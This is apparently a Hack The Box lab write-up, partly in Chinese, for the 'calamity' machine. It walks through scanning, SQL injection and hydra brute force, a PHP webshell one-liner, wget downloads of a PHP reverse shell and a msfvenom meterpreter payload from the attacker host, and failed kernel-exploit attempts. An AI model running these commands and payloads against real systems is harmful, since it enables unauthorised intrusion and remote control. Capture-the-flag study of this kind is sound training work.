nikto -h 10.10.10.27

• Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
• OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
• OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
• OSVDB-3092: /admin.php: This might be interesting…

## find exp

searchsploit EasyNews

http://10.10.10.27/admin.php

## find password

burp + sqlmap

POST /admin.php HTTP/1.1

Host: 10.10.10.27

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://10.10.10.27/admin.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 15

Connection: close

Upgrade-Insecure-Requests: 1

user=00&pass=00

sqlmap -r 1.req

sqlmap -r 1.req --risk 3 --level 5

6. 

hydra

cd /usr/share/seclists/Usernames
hydra -L top-usernames-shortlist.txt -P /usr/share/wordlists/500-worst-passwords.txt -f 10.10.10.27 http-post-form “/admin.php:user=^USER^&pass=^PASS^:HERE”

7. 

wapiti -u http://10.10.10.27/admin.php

not found any vul

8. 

curl -X POST http://10.10.10.27/admin.php -d "<?php system($_GET['cmd']) ?>" 

Password:
Username:

准备尝试post能否上传一句话，然后意外发现，源代码中藏着密码。

![](3.PNG)
发现图片中用户名和密码颠倒了，burp抓包...em，应该是开发错误。

9. 

cd /usr/share/seclists/Usernames hydra -L top-usernames-shortlist.txt -p skoupidotenekes -f 10.10.10.27 http-post-form "/admin.php:user=^USER^&pass=^PASS^:HERE"

hydra -L cirt-default-usernames.txt -p skoupidotenekes -f 10.10.10.27 http-post-form “/admin.php:user=^USER^&pass=^PASS^:HERE”

![](4.PNG)

10. http://10.10.10.27/admin.php?html=

html= admin.php bg.png index.html leet.png uploads
html= www-data
html=
html=

/bin/nc /bin/nc.openbsd nc不支持-e，于是上传php shell。
ls -al /tmp tmp目录可写不可读
d-wx-wx-wx 10 root root 4096 Mar 19 23:39 tmp

pwd /var/www/html

/usr/bin/wget http://10.10.14.7/php-reverse-shell.php -P /tmp

html=
chmod a+x /tmp/php-reverse-shell.php
html=
获得一个shell

11. info

Linux calamity 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:15:00 UTC 2017 i686 i686 i686 GNU/Linux

whereis gcc

gcc: /usr/bin/gcc /usr/lib/gcc /usr/share/man/man1/gcc.1.gz

准备上传msf类型exp。

msfvenom -a x86 –platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=6678 -f elf -o payload.elf

本地执行：
handler -H 10.10.14.7 -P 6678 -p linux/x86/meterpreter/reverse_tcp
python -m SimpleHTTPServer

远程shell执行：
wget http://10.10.14.7:8000/payload.elf -P /tmp
chmod a+x /tmp/payload.elf
./tmp/payload.elf

[*] Meterpreter session 5 opened (127.0.0.1 -> 127.0.0.1) at 2019-03-20 12:11:48 +0800

成功连接，但是一旦连接就会断开

12. searchsploit linux 4.4.0

wget http://10.10.14.7:8000/43418.c -P /tmp
chmod a+x /tmp/43418.c
gcc 43418.c -o pwn
编译失败

wget http://10.10.14.7:8000/pwn -P /tmp
chmod a+x /tmp/pwn
./pwn
二进制格式失败，kali本地编译运行为64位。

wget http://10.10.14.7:8000/44298.c -P /tmp
gcc 44298.c -o pwn
44298.c
编译失败

13. ps -ef | grep root

root 1049 1 0 Mar17 ? 00:00:01 /usr/bin/lxcfs /var/lib/lxcfs/
搜索lxcfs，判断主机可能是一个容器。

14. cat /home/xalvas/dontforget.txt

peda keeps commads history in the working dir…you should make a dir in /tmp and work from there
keep in mind that tmp is not listable,so other users cannot see your files and folders (if you dont use extrmely simple names)

15. 找到一个可写目录/var/tmp，将LinEnum.sh上传到目标机

wget http://10.10.14.7:8000/LinEnum.sh
wget http://10.10.14.7:8000/linux-exploit-suggester.sh
chmod a+x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

wget http://10.10.14.7:8000/40839
gcc -pthread 40839 -o dirty -lcrypt
/usr/bin/ld:40839: file format not recognized; treating as linker script
/usr/bin/ld:40839:2: syntax error
collect2: error: ld returned 1 exit status

16. 

nc -lnvp 7788 < recov.wav
Listening on [0.0.0.0] (family 0, port 7788)
Killed

python -m SimpleHTTPServer
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 …
Killed

提权需要绕过进程保护，绕过许多内存保护机制，利用二进制文件。手写exp。

看了wp也看不懂，溜了溜了。